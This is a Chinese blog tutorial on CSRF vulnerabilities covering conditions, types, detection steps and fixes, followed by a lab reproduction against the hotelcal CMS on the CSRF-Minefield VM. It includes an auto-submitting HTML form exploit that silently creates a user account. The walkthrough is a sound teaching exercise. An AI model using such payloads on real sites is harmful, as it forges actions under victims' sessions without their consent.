CSRF漏洞

最新推荐文章于 2024-11-10 21:05:45 发布
最新推荐文章于 2024-11-10 21:05:45 发布
阅读量51 收藏
点赞数
文章标签: csrf 安全 web安全 网络 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43335965/article/details/133012362
版权
目录

CSRF产生的条件

一、被攻击者在登陆了web网页,并且在本地生成了cookie
二、在cookie未过期的情况下,利用同一个浏览器访问了攻击者的页面。

CSRF漏洞分类

1、GET型
GET型CSRF漏洞,只需要构造URL,然后诱导受害者访问利用。
2、POST型
POST型CSRF漏洞,需要构造自动提交或点击提交的表单,然后诱导受害者访问或点击利用。

CSRF漏洞危害

未验证 Referer或者未使用有效的Token导致黑客可以利用受害者的身份操控浏览器。

CSRF漏洞检测

1、GET类型的CSRF的检测
如果有token等验证参数,先去掉参数尝试能否正常请求。如果可以,即存在CSRF漏洞。

2、POST类型的CSRF的检测
如果有token等验证参数,先去掉参数尝试能否正常请求。如果可以,再去掉referer参数的内容,如果仍然可以,说明存在CSRF漏洞,可以利用构造外部form表单的形式,实现攻击。如果直接去掉referer参数请求失败,这种还可以继续验证对referer的判断是否严格,是否可以绕过。

3、特殊情况的POST类型的CSRF检测
如果上述post方式对referer验证的特别严格,有的时候由于程序员对请求类型判断不是很严格,可以导致post请求改写为get请求,从而CSRF。直接以get请求的方式进行访问,如果请求成功,即可以此种方式绕过对referer的检测,从而CSRF。

CSRF漏洞修复方案

1、添加随机token值,并验证。
2、验证Referer
3、关键请求使用验证码功能

利用靶场CSRF-Minefield-V1.0漏洞复现

这个靶机放置了存在CSRF漏洞的CMS。

先看看hotelcal这个cms。进入到添加用户和删除用户的功能下。

点击Create New Account来增加一个用户。填写好信息,然后点击save抓包。

可以看到增加用户功能的数据包里面没有添加token进行csrf防护。
利用burp的插件CSRF POC生成exp。

将这段exp复制下来保存在kali的/var/www/html目录下,格式是html。

kali开启Web服务。

将前面的exp放在根目录下。
访问exp。
可以看到有一个按钮,当我们点击的时候就会生成一个用户。可以看到多出来一个新用户。

删除用户功能也存在CSRF漏洞,利用方法和增加用户一致。
burp生成的exp有一个按钮,需要受害用户点击,改一下exp,改成直接访问链接就直接增加一个用户。

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body onload=document.getElementById('ese-csrf').submit()>
    <form id="ese-csrf" action="http://192.168.88.161/hotelcal/admin/add_account.php" method="POST">
      <input type="hidden" name="name" value="ese" />
      <input type="hidden" name="username" value="ese" />
      <input type="hidden" name="password" value="ese123" />
      <input type="hidden" name="add&#95;account" value="" />
    </form>
  </body>
</html>
Held0
关注
csrf漏洞
m0_55772907的博客
04-27 792
  CSRF(Cross-site Request Forgery,跨站请求伪造),缩写CSRF,也有少数文章称为XSRF,一种利用用户在当前已登录的Web应用程序上执行非本意操作的攻击方法(利用受害者尚未失效的身份认证信息(cookie,会话等),创建恶意伪造的web页面请求,在受害者不知情的情况下向服务器发送请求完成非法操作(转账、改密等))。   简言之,攻击者间接利用受害者合法身份,以其身份发送恶意请求。 1.2 漏洞实质   攻击者通过技术手段欺骗用户的浏览器访问
CSRF 漏洞
Just a Blog
03-26 957
CSRF 漏洞
CSRF 漏洞验证
wj33333的博客
11-13 354
CSRF
CSRF 漏洞详解
一个努力学习网安的小牛马
11-13 640
CSRF漏洞详解
CSRF漏洞详解与挖掘
资深程序员,曾自学JAVA,C#,如今从业于网安行业
07-15 1056
CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用。
CSRF漏洞详解
渗透测试研究中心
06-10 1075
0x01 CSRF定义   CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。尽管听起来像跨站脚本XSS,但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流...
CSRF漏洞_bp csrf
zzz6583zz的博客
09-20 805
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
CSRFScanner:Python CSRF漏洞扫描器
05-06
Python CSRF漏洞扫描器 描述 CSRFScanner是一种用于扫描网站以查找CSRF漏洞的工具。 这是一个基本工具,不是很人性化,我最初是出于学术目的而开发的。 可以在PDF CSRFScanner_Explications.pdf(以法语编写)中...
hucart-含有CSRF漏洞的源码.zip
12-31
在这个案例中,"hucart-含有CSRF漏洞的源码.zip" 提供了一个实际的示例,让我们深入探讨一下CSRF漏洞的原理、危害以及防范措施。 1. **CSRF漏洞原理**: CSRF漏洞通常发生在Web应用程序中,这些应用未对请求进行...
CSRF详解
QQ_778132974的博客
11-09 478
CSRF攻击的典型流程如下:受害者登录到受信任的网站,并在其浏览器中保存了有效的会话cookie或认证令牌。恶意网站或链接包含了一个指向受信任网站的隐藏表单或JavaScript请求,该请求旨在利用受害者的会话cookie或认证令牌执行恶意操作。攻击者:试图利用受害者的身份在受信任的网站上执行恶意操作的人。受害者的浏览器自动发送包含会话cookie或认证令牌的请求到受信任的网站。受信任的网站验证会话cookie或认证令牌有效,并执行请求中的操作,尽管这些操作并非受害者本意。
spring-security(记住密码,CSRF
最新发布
2302_79087378的博客
11-10 644
PersistentTokenRepository实现类InMemoryTokenRepositoryImpl基于内存实现JdbcTokenRepositoryImpl基于数据库实现@Bean。
@csrf_exempt装饰器
DngYT的博客
11-10 482
用于标记一个视图函数或类,以指示 Django 框架在处理该视图时应该跳过跨站请求伪造(CSRF)保护。CSRF 是一种网络攻击方式,攻击者诱导用户在已认证的网站上执行非预期的操作。Django 默认启用了 CSRF 保护,以防止这种攻击。如果希望某个视图不受 CSRF 保护。如果你的视图是一个 API 端点,并且你通过其他方式(如 API 密钥、OAuth 等)来验证请求,那么你可能不需要 CSRF 保护。在这些情况下,你可以使用装饰器。
CSRF 令牌
卡布达的博客
11-10 318
CSRF(跨站请求伪造保护)令牌是一种安全机制,用于防止跨站请求伪造攻击。在 Django 应用中,CSRF 令牌通常用于验证请求是否由您的网站发出,以确保请求是合法的。在 Django 中,CSRF 令牌通常通过模板标签在 HTML 模板中生成。在发送 AJAX 请求时,您需要从这个标签获取 CSRF 令牌,并将其包含在请求头中。
网络安全从零开始学习CTF——CTF基本概念
Hacker_Oldv的博客
11-09 1695
不要太深入,差不多就可以了,对照文档就可以写出程序就差不多了且能看得懂就好了,因为每个语言都是学不完的,一直在更新,如果过分专注于一个语言,安全知识就挺容易漏下的。上面都是个人想法,怎么选都要靠自己决定,要不要深入、深入哪一门都是问题,一定要考虑清楚再下手,别等下学了一半就改变方向,这是学习的大忌,因为你学其它的也会这样,除非是你发现这个不是很适合你的发展。其中,一血、二血、三血拿的分数比较高,后面答该题的队伍拿的分数就一样了,答题的队伍越少,分数就越多,然后按分数排名,确定进入决赛的队伍。
微软日志丢失事件敲响安全警钟
juminfo的博客
11-08 573
据报告,从9月2日至9月19日,持续长达两周的时间里,微软的多项核心云服务,包括身份验证平台Microsoft Entra、安全信息与事件管理(SIEM)平台Sentinel、云安全解决方案Defender for Cloud以及数据目录服务Purview,都经历了安全日志记录的空白期。系统可以实时、不间断地收集并整合各类设备的日志信息,通过先进的关联分析技术和机器学习手段,助力用户从庞杂的日志数据中快速识别异常安全事件,全面满足合规审计、分析调查及数据留存等多日志场景使用需求。
信息安全工程师(82)操作系统安全概述
m0_73399576的博客
11-08 1429
信息安全工程师——操作系统安全概述篇
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值